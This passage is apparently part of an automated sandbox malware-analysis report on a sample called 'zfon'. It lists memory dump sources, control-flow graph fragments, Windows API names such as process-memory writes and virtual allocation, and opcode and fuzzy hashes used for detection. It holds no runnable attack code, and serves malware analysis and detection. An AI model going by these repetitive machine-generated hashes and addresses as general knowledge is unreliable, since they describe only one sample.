                                                                                                control_flow_graph 488 7ff7f9819adf-7ff7f9819afb 489 7ff7f9819afd-7ff7f9819b01 488->489 490 7ff7f9819b16-7ff7f9819b25 488->490 489->490 491 7ff7f9819b03-7ff7f9819b14 489->491 492 7ff7f9819b27-7ff7f9819b4c 490->492 493 7ff7f9819b51-7ff7f9819b62 490->493 491->489 491->490 492->493 494 7ff7f9819b66-7ff7f9819b6d 493->494 495 7ff7f9819ba8-7ff7f9819bad LoadLibraryA 494->495 496 7ff7f9819b6f-7ff7f9819b7e 494->496 499 7ff7f9819bb0-7ff7f9819bbf 495->499 497 7ff7f9819b9b-7ff7f9819ba1 496->497 498 7ff7f9819b80-7ff7f9819b99 call 7ff7f981a34b 496->498 497->494 501 7ff7f9819ba3-7ff7f9819ba6 497->501 498->497 503 7ff7f9819bc0-7ff7f9819bc3 498->503 501->495 501->499 503->499
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: l
                                                                                                • API String ID: 1029625771-2517025534
                                                                                                • Opcode ID: 1d083b3de9a9ed48a996e456de89af2bb64d5134e63aa677a92d7ef34e970a50
                                                                                                • Instruction ID: fcbc9adab92d3621250cbe816dc2ca8ae3e3c141a7004ed5b328f5b5596f4f2f
                                                                                                • Opcode Fuzzy Hash: 1d083b3de9a9ed48a996e456de89af2bb64d5134e63aa677a92d7ef34e970a50
                                                                                                • Instruction Fuzzy Hash: C321DD22A2C6D5C6EB519F24F444329ABA0F759BD8F581375CF9E07B98CB2DD0A48720

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandleInformationProcessQuery
                                                                                                • String ID:
                                                                                                • API String ID: 1431398230-0
                                                                                                • Opcode ID: 8892a3de4c354403ffd96d30362b0f6fa85d71dbda6d833dead5add144ef140a
                                                                                                • Instruction ID: bfb34021917273949c0546f53a0d9a2eeee6352c4847f242639a2189c2c1e023
                                                                                                • Opcode Fuzzy Hash: 8892a3de4c354403ffd96d30362b0f6fa85d71dbda6d833dead5add144ef140a
                                                                                                • Instruction Fuzzy Hash: AF51B53091CB588FDB58EF1CD8846A6B7E1FBA9310F104A5EF489C7256DB709884CB82

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: fd99b70dfc6966dce4256ea9522189a526efb06900cfd91d0ed215b37b37ac08
                                                                                                • Instruction ID: ff5b1bf972942e55c0252ce18b7b4314d5019c2f76be7396e32e04661d4f1a5e
                                                                                                • Opcode Fuzzy Hash: fd99b70dfc6966dce4256ea9522189a526efb06900cfd91d0ed215b37b37ac08
                                                                                                • Instruction Fuzzy Hash: CC012930618A0C4FE794DF1CE4497A9B6E1FBAC310F6042AAA40DC7266DA749985CB81

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: e2d03e14ecea67ae3140c875a343d63f63740cbf0b01b1a0b106d18d7c617194
                                                                                                • Instruction ID: b49cc3c20142cd51a4064eca0100786f4702a82c5a03e11474d089ca142f5318
                                                                                                • Opcode Fuzzy Hash: e2d03e14ecea67ae3140c875a343d63f63740cbf0b01b1a0b106d18d7c617194
                                                                                                • Instruction Fuzzy Hash: 6BF0FF30614A4A4BE709EB74D8A92A773D2FB94300F60492AF443C21A2EE68D945C682

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 681 2dc4be87be0-2dc4be87bf4 683 2dc4be87bf6-2dc4be87bfe 681->683 684 2dc4be87bff-2dc4be87c31 call 2dc4be811b0 TlsFree 681->684
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free
                                                                                                • String ID:
                                                                                                • API String ID: 3978063606-0
                                                                                                • Opcode ID: d64f5b2062c7967b43152f63818274d0a04062ae98c3a6f56fe57c2b33e813dc
                                                                                                • Instruction ID: 594b9c75ff9649d56af4ff4b45b153aee3789c31a63a0bead539bb11d4b8c034
                                                                                                • Opcode Fuzzy Hash: d64f5b2062c7967b43152f63818274d0a04062ae98c3a6f56fe57c2b33e813dc
                                                                                                • Instruction Fuzzy Hash: 74F0E5342008088BE71DABB6EDC956033A5E749311F500B2AE52BC71E1EB3A5859C743

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 687 2dc4beae518-2dc4beae51b 688 2dc4beae51d-2dc4beae536 RtlFreeHeap 687->688 689 2dc4beae553 687->689 690 2dc4beae538-2dc4beae547 call 2dc4bea06d8 call 2dc4bea07ac 688->690 691 2dc4beae54e-2dc4beae552 688->691 690->691 691->689
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 8f455e8927717cf74da2ea1d6b0ff16729446bc41146d6effb8fe588f7080467
                                                                                                • Instruction ID: 9b4b7b08dc1b9ef4b211c4bf88a1662f1adb1eaae84980d8aedde3e10adacd7d
                                                                                                • Opcode Fuzzy Hash: 8f455e8927717cf74da2ea1d6b0ff16729446bc41146d6effb8fe588f7080467
                                                                                                • Instruction Fuzzy Hash: B7E0C234702A0707FF1C67BAACAD27B328B9BCD201F248426FC01C619AEE298C40C642

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 696 2dc4be546b0-2dc4be546ce 697 2dc4be546d0-2dc4be546da 696->697 698 2dc4be546f9-2dc4be54700 696->698 697->698 701 2dc4be546dc-2dc4be546ee CloseHandle 697->701 699 2dc4be54702-2dc4be5470c 698->699 700 2dc4be54729-2dc4be54738 698->700 699->700 703 2dc4be5470e-2dc4be5471e 699->703 701->698 702 2dc4be546f0-2dc4be546f4 701->702 702->698 703->700 705 2dc4be54720-2dc4be54724 703->705 705->700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: 86e0eb6f4946c0b3aae63fa0a3b42eecc3b4de38385dd7f2f15c74cfef035e0a
                                                                                                • Instruction ID: 1ac56ab9ffa00f09623bd4d69c164ea09ad1bcf757e21d59e154f7c992adf454
                                                                                                • Opcode Fuzzy Hash: 86e0eb6f4946c0b3aae63fa0a3b42eecc3b4de38385dd7f2f15c74cfef035e0a
                                                                                                • Instruction Fuzzy Hash: 2B114C34604A298FDFD0EF5DC4D8B1577E1FB99331B584569E40ACB259D634CC45CB81
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 552761200-0
                                                                                                • Opcode ID: a7f2bf8d6ee9c32b1490e42ad02cb0604fc4ff821b5949c4f80fc3c9d251ac62
                                                                                                • Instruction ID: a5be9f0a4b6f8ce97231c6e5f949d5f3e8038d4a103d19a5abe4e942f2fa5e95
                                                                                                • Opcode Fuzzy Hash: a7f2bf8d6ee9c32b1490e42ad02cb0604fc4ff821b5949c4f80fc3c9d251ac62
                                                                                                • Instruction Fuzzy Hash: 2AE197352187064BEB59EF28D8B96A777E7FB88340F60452BE446C72D2DA34DC41C786
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_clear$cef_string_utf16_set$cef_string_multimap_keycef_string_multimap_sizecef_string_multimap_valuecef_string_utf16_cmp
                                                                                                • String ID:
                                                                                                • API String ID: 1610809521-0
                                                                                                • Opcode ID: 2fd182909d36940ed77f8fa1be500dae443977ddcc0a19fb9f2af5057e379218
                                                                                                • Instruction ID: 736b6be1bf5834385223905e11bf631e47d71a92c3f0c302accfdfb7f8045fcb
                                                                                                • Opcode Fuzzy Hash: 2fd182909d36940ed77f8fa1be500dae443977ddcc0a19fb9f2af5057e379218
                                                                                                • Instruction Fuzzy Hash: A6B16022609B8185EB96AF15AC4476AB7B1FF49BC0F988034DA5D077E8EF3CD444C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                • String ID: 0
                                                                                                • API String ID: 1944019136-4108050209
                                                                                                • Opcode ID: ba49a7cfee16781f8ea1fd221730e21fb97c5df0ad4d632842d7b8982b924624
                                                                                                • Instruction ID: c11f0f6ad00bbd44c2999f16e01f29ae81f747fdc13a2d1552a4a634247ba42c
                                                                                                • Opcode Fuzzy Hash: ba49a7cfee16781f8ea1fd221730e21fb97c5df0ad4d632842d7b8982b924624
                                                                                                • Instruction Fuzzy Hash: 69E1EB35514E8D8FEB54EF28C898BEA77E2FBA9300F604A1AE449C3192DB74DD85C741
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2606324920.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000006.00000002.2606008536.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2606835994.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2607973026.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608127384.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608223601.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608300064.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000006.00000002.2608364168.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_7ff7f96e0000_zfon.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: cef_string_utf16_clear
                                                                                                • String ID:
                                                                                                • API String ID: 2864223729-0
                                                                                                • Opcode ID: 3172e399ba896f2375b6c67c0f11b0d6cee9284634a0a73235df06711df15462
                                                                                                • Instruction ID: 5cf5bf708bc17c66b19be321a88a27ddae350fd7e883f3471fbbe9fcdef8d512
                                                                                                • Opcode Fuzzy Hash: 3172e399ba896f2375b6c67c0f11b0d6cee9284634a0a73235df06711df15462
                                                                                                • Instruction Fuzzy Hash: 2EF01412A1858991EB90FF64CC521FE5A31AB58744FC41E31E62D450EB9F18D55683B1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+$NameName::
                                                                                                • String ID:
                                                                                                • API String ID: 168861036-0
                                                                                                • Opcode ID: d02a360015473b4719725f8be3ceded12c4e7da7de9f02c09df3532ae03b7663
                                                                                                • Instruction ID: f6dd4be62f39c3a1583c2b9411cd20e42f2523c748043de63e93b4d75c2d2b09
                                                                                                • Opcode Fuzzy Hash: d02a360015473b4719725f8be3ceded12c4e7da7de9f02c09df3532ae03b7663
                                                                                                • Instruction Fuzzy Hash: DD81C434924E0A8FEB55DF58D898BAA77F2FB95300F20415AD00AD7295DB749C89CB42
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 35ae5500d617e4e34fe7a48e5de47b389157bb8d741169297bf601fcce6233db
                                                                                                • Instruction ID: d7512ad6e4cfb92b4c954559b149e647b76f8e52ff89df72b471b998727d9139
                                                                                                • Opcode Fuzzy Hash: 35ae5500d617e4e34fe7a48e5de47b389157bb8d741169297bf601fcce6233db
                                                                                                • Instruction Fuzzy Hash: 82519534118E1D8FEB54EF5CC499B66B7E1FBA9310F50055EE14AC31A2DA70EC44CB82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 61e06795d542277064a9063eb9b9662c84188e01c661d0321e092b5a3e40d221
                                                                                                • Instruction ID: e0903de266ff9e7943753a51f4d91ae4171df12f8a815f0f9854793b309acc8f
                                                                                                • Opcode Fuzzy Hash: 61e06795d542277064a9063eb9b9662c84188e01c661d0321e092b5a3e40d221
                                                                                                • Instruction Fuzzy Hash: 2A51A434614A0E8FE798EF58D4A87A773D2FBD9310F60056BE409C3192DA70EC45CB82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: d83bd2ec66cc20632ef20e6c13a125de58649c408e943948c276adf13a798222
                                                                                                • Instruction ID: 2314b67beaa4439e49aa24bdccc93977df6b27038babec824f46ec7f80c98195
                                                                                                • Opcode Fuzzy Hash: d83bd2ec66cc20632ef20e6c13a125de58649c408e943948c276adf13a798222
                                                                                                • Instruction Fuzzy Hash: 15419135114D0A8FEB99EF5CD4A87AB73E2FBA9310F60055AE40AC3197DA70EC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 1001463fed7176c6a56c2cc361bdc8a5f2760466829b86a5aa937572d60040f5
                                                                                                • Instruction ID: 7ea05369f60602f67c8acc49c3331ae925093ab2e859334bac4df78ac64e23ec
                                                                                                • Opcode Fuzzy Hash: 1001463fed7176c6a56c2cc361bdc8a5f2760466829b86a5aa937572d60040f5
                                                                                                • Instruction Fuzzy Hash: C2416535118E098FE784EF58D4A9B6777E1FBA8310F20056FE05AD32A2DA30DD46CB42
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 9d8fa5dccc2c7df26ba784e87d8baca838a30e895e23befe89f00c96d4a17384
                                                                                                • Instruction ID: 55b3d2e9e263d76662ea0c862dce7a5fbcbf106b5903ed7423b66018b15c311e
                                                                                                • Opcode Fuzzy Hash: 9d8fa5dccc2c7df26ba784e87d8baca838a30e895e23befe89f00c96d4a17384
                                                                                                • Instruction Fuzzy Hash: AD419A35118E0A8FEB94EF58D69976773E2FBA8310F20065ED559C3163DA30DC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2656477967-0
                                                                                                • Opcode ID: aabf4c4db5fb73a72882f7e28f833ad5c50c59743f7b5512740becf53d4abf52
                                                                                                • Instruction ID: f95cffa2f94c789f41ef4a1540ef75140a4b4cdef1ab63d3a655af1f475f82e2
                                                                                                • Opcode Fuzzy Hash: aabf4c4db5fb73a72882f7e28f833ad5c50c59743f7b5512740becf53d4abf52
                                                                                                • Instruction Fuzzy Hash: E1418335118E0A8FEB84EF58D4A97A777E2FBA8354F20066EE059C31A2CA30DD41C743
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeRegister
                                                                                                • String ID:
                                                                                                • API String ID: 3084244483-0
                                                                                                • Opcode ID: 382b27cc47d4d4d2e3d12a9d844b30cb403f7a8cf6ab082c956de496a2ecd116
                                                                                                • Instruction ID: ca192b5a57e53fffa405bbcd558e16d5684b16de3c8da8042605d77784606f92
                                                                                                • Opcode Fuzzy Hash: 382b27cc47d4d4d2e3d12a9d844b30cb403f7a8cf6ab082c956de496a2ecd116
                                                                                                • Instruction Fuzzy Hash: B4412135118E0ACFEB94EF58D499B67B7E2FBA8314F24055AD05AC31A2DA30DD45CB42
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 36a46e987eec6efcde8bae8a05a4e734d5a5e009e9c00953979c006a253adb4b
                                                                                                • Instruction ID: 2a2c1430d039b266162ea6ad751fdec0c743c2a02093d896d551cb4fb18a3fac
                                                                                                • Opcode Fuzzy Hash: 36a46e987eec6efcde8bae8a05a4e734d5a5e009e9c00953979c006a253adb4b
                                                                                                • Instruction Fuzzy Hash: C731B635108E0E8FEB59EF6CD4A8B6677D2FBA5310F61045AE04AC3192DA74EC41C752
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: f5e824b2dde862fc8a5caf3f520fa1d0980ed76ea4d730938b0c4883bc113c9d
                                                                                                • Instruction ID: cdf6d9528312a97261fffe07e0e52fe1129d9643383e7b9f5239b8c16f89b1a1
                                                                                                • Opcode Fuzzy Hash: f5e824b2dde862fc8a5caf3f520fa1d0980ed76ea4d730938b0c4883bc113c9d
                                                                                                • Instruction Fuzzy Hash: 7A317635154E0E8FE755EF5CD4A87A773E2FBA9311F60056AE14AC3192CA70EC45C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 0e0b4bc94f2b3c7afd887f05d336140725c02ad7d302b9a78c8a1559e9cda62f
                                                                                                • Instruction ID: e325417b2a6088a4f88c62b294cbbbb73bba74eb0f6a7032cf7a3adbbb574410
                                                                                                • Opcode Fuzzy Hash: 0e0b4bc94f2b3c7afd887f05d336140725c02ad7d302b9a78c8a1559e9cda62f
                                                                                                • Instruction Fuzzy Hash: 2A317234218E0E8FFB55EF5CD8A8B6A77D2FBA5311F60051AD01AC71A2DA74EC02C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: f72df842b82b4a430b4d027ead144aca89143fcd5ebe3d3ae9cdc68471bc4dd1
                                                                                                • Instruction ID: b351130b57abb57aa3abf1381039fd690e4917acdc0bac389d936b1fc3aa0c84
                                                                                                • Opcode Fuzzy Hash: f72df842b82b4a430b4d027ead144aca89143fcd5ebe3d3ae9cdc68471bc4dd1
                                                                                                • Instruction Fuzzy Hash: EE315335618A1D8FE795EB58D8A876773E2FBA5310F20056BD04AC7196DA70EC05C782
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
                                                                                                • Opcode ID: 9ecde91bfa52677a9f7eb40db556c6463bf84d91d5f91572ceb0c1cf1e3b6d3d
                                                                                                • Instruction ID: 2702a534bba2f1bf2700ece595574e27eb5929155bc79d5ab89c73fe007ae0e2
                                                                                                • Opcode Fuzzy Hash: 9ecde91bfa52677a9f7eb40db556c6463bf84d91d5f91572ceb0c1cf1e3b6d3d
                                                                                                • Instruction Fuzzy Hash: A9318335118E1A8FFB55EF5CD8A8B6773D2FBA9310F61055AE00AC7192CA70EC06C742
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000006.00000002.2604169993.000002DC4BE41000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002DC4BE41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_6_2_2dc4be41000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 2081738530-0
